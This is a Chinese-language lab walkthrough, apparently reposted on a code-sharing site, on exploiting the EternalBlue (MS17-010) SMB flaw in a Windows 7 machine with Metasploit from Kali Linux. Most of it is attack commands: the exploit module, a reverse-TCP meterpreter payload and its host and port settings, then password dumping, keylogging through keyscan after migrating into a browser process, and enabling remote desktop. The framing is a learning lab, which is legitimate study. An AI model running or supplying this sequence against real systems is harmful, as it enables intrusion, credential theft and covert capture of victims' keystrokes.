永恆之藍(ms017-010)漏洞利用


永恆之藍(ms017-010)漏洞利用

1、實驗環境

靶機win7

地址:192.168.1.xxx

登錄密碼:xxxx

攻擊機:kail linux

地址:192.168.1.xxx

登錄用戶名:root

登錄密碼:xxx

2、實驗原理:

“永恆之藍”的原理主要是掃描所有開放445文件共享端口的Windows機器。

445端口簡介:

       445端口是一個毀譽參半的端口,有了它我們可以在局域網中輕松訪問各種共享文件夾或共享打印機,但也正是因為有了它,黑客們才有了可乘之機,他們能通過該端口偷偷共享你的硬盤,甚至會在悄無聲息中將你的硬盤格式化掉! 201710月,由於病毒"壞兔子"來襲,國家互聯網應急中心等安全機構建議用戶及時關閉計算機以及網絡設備上的445139端口 。

實驗步驟:

Step1:啟動msf

 

Step2:搜索search ms17-010模塊

 

發現目標靶機上存在永恆之藍漏洞。

Step3:加載攻擊模塊並配置參數

 

use exploit/windows/smb/ms17_010_eternalblue

setp4:設置payload(設置攻擊程序)

set payload windows/x64/meterpreter/reverse_tcp

setp5:設置相關參數

show options

set rhost 192.168.1.5 (靶機的IP)

set lhost 192.168.1.88 (發起攻擊的主機IP)

set lport 443       (監聽的端口)

 

 

Step6:發起攻擊,成功會反彈shell

輸入run或者exploit

 

Step7:獲取屏幕數據

 

Step8:獲取密碼

 

Step9:鍵盤監聽

 ps 看瀏覽器或者記事本等進程號

migrate轉到相應的進程

(1) keyscan_start: 啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件

(2) keyscan_dump 鍵盤記錄軟件的內容轉儲,此時可以看到剛剛在靶機上輸入的內容

(3) keyscan_stop: -停止鍵盤記錄軟件

step10:開啟遠程

1run post/windows/manage/enable_rdp,或run getgui -e

利用此后滲透模塊即可直接開啟遠程桌面

2)KaliLinux操作系統中的rdesktop  靶機地址 命令即可直接使用root賬號登錄到靶機系統中

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM